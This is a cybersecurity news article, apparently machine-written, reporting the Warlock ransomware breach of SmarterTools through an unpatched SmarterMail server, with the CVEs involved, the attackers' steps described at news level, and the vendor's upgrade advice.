Today's cybersecurity headlines are brought to you by ThreatPerspective
Ethical Hacking News

Unpatched SmarterMail Server Exposes SmarterTools to Devastating Warlock Ransomware Attack



SmarterTools recently suffered a devastating cyber attack at the hands of the notorious Warlock ransomware gang. The attackers exploited an unpatched SmarterMail server to gain access to the company's network and cause significant damage. In light of this attack, users are advised to upgrade to the latest version of SmarterMail (Build 9526) immediately for optimal protection.

  • The SmarterTools company was targeted by the Warlock ransomware gang in a devastating cyber attack on January 29, 2026.
  • About 30 servers/VMs with SmarterMail installed were affected by the breach, but other services and business applications remained unaffected.
  • The attackers exploited an unpatched SmarterMail server that was not being updated, gaining initial access to SmarterTools' network.
  • Multiple vulnerabilities in SmarterMail were identified as being exploited by the Warlock gang, including CVE-2025-52691 and CVE-2026-24423.
  • SmarterTools has since patched several critical vulnerabilities and advised users to upgrade to the latest version of SmarterMail for optimal protection.



    • SmarterTools, a company that provides email management solutions, recently suffered a devastating cyber attack at the hands of the notorious Warlock ransomware gang. The attack occurred on January 29, 2026, when an unpatched SmarterMail server was compromised by the attackers. This vulnerability allowed them to gain access to SmarterTools' network and cause significant damage.

    According to Derek Curtis, SmarterTools' Chief Commercial Officer, approximately 30 servers/VMs with SmarterMail installed throughout their network were affected by the breach. However, it's worth noting that the company emphasized that the attack did not affect its website, shopping cart, My Account portal, and several other services, nor did any business applications or account data come into play.

    The attackers targeted a mail server set up by an employee that was not being updated. The Warlock group exploited this vulnerability to gain initial access to SmarterTools' network. After gaining entry, the attackers waited for a couple of days before taking control of the Active Directory server and creating new users. They then dropped additional payloads like Velociraptor and the locker to encrypt files.

    Researchers have identified multiple vulnerabilities in SmarterMail that were exploited by the Warlock gang, including CVE-2025-52691 (CVSS score: 10.0), CVE-2026-23760, and CVE-2026-24423 (CVSS scores: 9.3). These vulnerabilities allowed attackers to bypass authentication and reset administrator passwords, among other things.

    The security expert Alexa Feminella from ReliaQuest stated that the attackers used a legitimate cloud-based backend platform called Supabase to download a malicious MSI installer ("v4.msi") in order to install Velociraptor. This allowed them to maintain access and set the stage for ransomware.

    "The pace of weaponization is consistent with ransomware operators rapidly analyzing vendor fixes and developing working tradecraft shortly after release," Feminella added.

    In light of this attack, SmarterTools has issued a warning to its users, advising them to upgrade to the latest version (Build 9526) immediately for optimal protection. The company also recommended that users isolate their mail servers to block lateral movement attempts used to deploy ransomware.

    SmarterMail has subsequently patched several critical vulnerabilities with CVSS scores of 9.3 or higher, including CVE-2026-23760 and CVE-2026-24423. These patches have been released in build 9511.

    The attack on SmarterTools serves as a reminder for companies to prioritize patching their software, especially when it comes to email management solutions like SmarterMail. Unpatched vulnerabilities can lead to devastating cyber attacks that put businesses at risk of financial loss and reputational damage.

    In conclusion, the Warlock ransomware gang has shown its ability to exploit unpatched SmarterMail servers in order to gain access to networks and cause significant damage. SmarterTools has since addressed this vulnerability by releasing a patch for several critical vulnerabilities with CVSS scores of 9.3 or higher. As a result, users are advised to upgrade to the latest version of SmarterMail (Build 9526) immediately for optimal protection.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/Unpatched-SmarterMail-Server-Exposes-SmarterTools-to-Devastating-Warlock-Ransomware-Attack-ehn.shtml

  • https://thehackernews.com/2026/02/warlock-ransomware-breaches.html

  • https://www.darkreading.com/application-security/warlock-gang-breaches-smartertools-smartermail-bugs

  • https://nvd.nist.gov/vuln/detail/CVE-2025-52691

  • https://www.cvedetails.com/cve/CVE-2025-52691/

  • https://nvd.nist.gov/vuln/detail/CVE-2026-23760

  • https://www.cvedetails.com/cve/CVE-2026-23760/

  • https://nvd.nist.gov/vuln/detail/CVE-2026-24423

  • https://www.cvedetails.com/cve/CVE-2026-24423/

  • https://thehackernews.com/2025/08/attackers-abuse-velociraptor-forensic.html

  • https://docs.velociraptor.app/knowledge_base/tips/velocirator_misuse/

  • https://pvml.com/blog/supabase-tech-response/

  • https://supabase.com/docs/guides/security


    • Published: Tue Feb 10 05:40:16 2026 by llama3.2 3B Q4_K_M


    © Ethical Hacking News . All rights reserved.

    Privacy | Terms of Use | Contact Us